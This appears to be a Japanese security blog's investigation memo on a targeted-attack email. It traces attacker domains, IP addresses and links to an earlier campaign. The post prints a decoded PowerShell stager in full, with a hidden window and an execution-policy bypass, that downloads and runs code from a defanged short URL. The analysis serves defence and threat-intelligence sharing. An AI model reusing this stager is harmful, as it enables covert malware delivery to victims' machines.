このメールに添付されていたと考えられるファイルの情報は下記の通りです。

展開後のファイルの情報は下記の通りです。

上記ファイルをテキストエディタで開いた内容は下図の通りです。

上図の文字列内にあるエンコードされた部分をデコードした結果は以下の通りです。

2ドル=’-nop -w hidden -exec bypass -c “IEX (New-Object System.N’;10ドル=’et.Webclient).DownloadString(”https://goo[dot]gl/KwjOFi”)”‘;2ドル+=10ドル;if([IntPtr]::Size -eq 8){3ドル = $env:SystemRoot + “\syswow64\WindowsPowerShell\v1.0\powershell”;iex “& 3ドル 2ドル”;}else{iex “& powershell 2ドル”;}

上記では、googleの短縮URLが利用されていた為、Google URL Shortenerで確認したところこの短縮URLが作成されたのは2017年2月20日でした。

また、この短縮URLを展開した際のURLに含まれるサブドメインについて調査を行いました。その結果下図のように初めて観測された日付が2017年2月20日であり、22日までIPアドレス「192[dot]241.255.61」が割り当てられていたことが判明しました。

以上のことから短縮URLの作成日、サブドメインに割り当てられたIPアドレスの観測日が注意喚起を出していたブログ内にあった送信日と一致したと言えます。
短縮URLを展開したファイルについてはlnkファイルを実行することでダウンロードされるものですが、調査日現在、ファイルが削除されていたため入手には至りませんでした。しかし、これらの攻撃の手口は、過去に当ブログにもポストした「日本学術振興会を騙った標的型攻撃メール 調査メモ」と同様の手口であるため同じ攻撃者グループによるものと推測されます。前述のブログエントリにて判明したドメインと今回判明したドメインについて調査したところ下図のように参照しているDNSが同じものであることが判明しました。

また、関連性の調査から不審なサブドメイン「fukuoka.tokyo-gojp[dot]com」が存在していたことが確認できました。このサブドメインのIPアドレスの割り当てについては下図の通りで2017年2月22日のみ「185[dot]61.148.130」であったことが確認できました。

以下は、本エントリの調査により判明したインディケータ情報です。

【2017年04月27日 追記】
今回の調査のきっかけとなったブログの過去エントリについてウイルスに関するエントリが存在するかの確認を行ったところ、以下のような文面を含む2015年3月23日付けのエントリ(魚拓)が存在することが確認できました。

ウィルスメールについて

【調査会NEWS1823】(27.3.23)

メールニュース送信先の一部の方に次のようなメールが送られています。
——————————-
本メールは、保険を利用して診察や診療を受けられた方に、医療費のご負担額等をお知らせしています。
Windows-PCで開けてください。
——————————–
言うまでもなくこれは調査会から送ったものではありません。添付ファイルが付いている場合は絶対に開かずに直ぐ消去して下さい。

原因については現在調査中です。ご迷惑をおかけして申しわけありません。

上記内にあるメールの文面は、過去に「医療費通知のお知らせ」という件名で、同名のzipファイルが添付されていた標的型攻撃メールの文面と同様です。

情報共有は以上です。

【2017年04月27日 追記】
調査のきっかけになったブログの過去エントリについて追記

【2017年04月17日 初版公開】